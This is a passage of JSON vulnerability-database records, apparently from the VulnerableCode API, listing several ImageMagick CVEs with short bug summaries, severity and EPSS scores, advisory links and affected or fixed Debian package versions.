"scoring_system": "epss", "scoring_elements": "0.24108", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00089", "scoring_system": "epss", "scoring_elements": "0.2526", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57803" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57803", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57803" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-24T03:55:19Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-24T03:55:19Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-24T03:55:19Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57803", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57803" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1112469", "reference_id": "1112469", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1112469" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391093", "reference_id": "2391093", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391093" }, { "reference_url": "https://github.com/advisories/GHSA-mxvv-97wh-cfmm", "reference_id": "GHSA-mxvv-97wh-cfmm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mxvv-97wh-cfmm" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:16313", "reference_id": "RHSA-2025:16313", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:16313" }, { "reference_url": "https://usn.ubuntu.com/7812-1/", "reference_id": "USN-7812-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7812-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-57803", "GHSA-mxvv-97wh-cfmm" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f6pf-5jnz-fkd1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21438?format=api", "vulnerability_id": "VCID-fnck-7mvx-hqc9", "summary": "ImageMagick has a heap Buffer Over-read in its DJVU image format handler\nA heap Buffer Over-read vulnerability exists in the DJVU image format handler. The vulnerability occurs due to integer truncation when calculating the stride (row size) for pixel buffer allocation. The stride calculation overflows a 32-bit signed integer, resulting in an out-of-bounds memory reads.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27799.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27799.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27799", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03365", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03402", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03416", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03299", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03288", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03312", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03335", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0338", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03385", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03363", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03353", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03406", "published_at": "2026-04-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27799" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27799", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27799" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T17:03:55Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/e87695b3227978ad70b967b8d054baaf8ac2cced", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T17:03:55Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/e87695b3227978ad70b967b8d054baaf8ac2cced" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r99p-5442-q2x2", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T17:03:55Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r99p-5442-q2x2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27799", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27799" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442879", "reference_id": "2442879", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442879" }, { "reference_url": "https://github.com/advisories/GHSA-r99p-5442-q2x2", "reference_id": "GHSA-r99p-5442-q2x2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r99p-5442-q2x2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-27799", "GHSA-r99p-5442-q2x2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fnck-7mvx-hqc9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24450?format=api", "vulnerability_id": "VCID-g41y-dv8u-3yf1", "summary": "ImageMagick has Heap Buffer Overflow in WaveletDenoiseImage\nA crafted image could cause an out of bounds heap write inside the WaveletDenoiseImage method. When processing a crafted image with the -wavelet-denoise operation an out of bounds write can occur.\n\n```\n=================================================================\n==661320==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x503000002754 at pc 0x5ff45f82c92a bp 0x7fffb732b400 sp 0x7fffb732b3f0\nWRITE of size 4 at 0x503000002754 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30936.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30936.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30936", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04429", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04412", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04378", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04368", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04346", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05231", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0513", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05114", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05099", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05047", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05052", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.052", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30936" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30936", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30936" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5ggv-92r5-cp4p", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:48:08Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5ggv-92r5-cp4p" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30936", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30936" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445880", "reference_id": "2445880", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445880" }, { "reference_url": "https://github.com/advisories/GHSA-5ggv-92r5-cp4p", "reference_id": "GHSA-5ggv-92r5-cp4p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5ggv-92r5-cp4p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-30936", "GHSA-5ggv-92r5-cp4p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g41y-dv8u-3yf1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/64285?format=api", "vulnerability_id": "VCID-g679-q851-xub7", "summary": "ImageMagick: stack-based buffer overflow in sixel encoder", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32259.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32259.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32259", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04109", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04189", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04127", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04143", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04175", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04169", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04151", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04841", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04944", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0498", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04799", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0479", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32259" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32259", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32259" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447112", "reference_id": "2447112", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447112" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-49hx-7656-jpg3", "reference_id": "GHSA-49hx-7656-jpg3", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-13T16:13:57Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-49hx-7656-jpg3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": 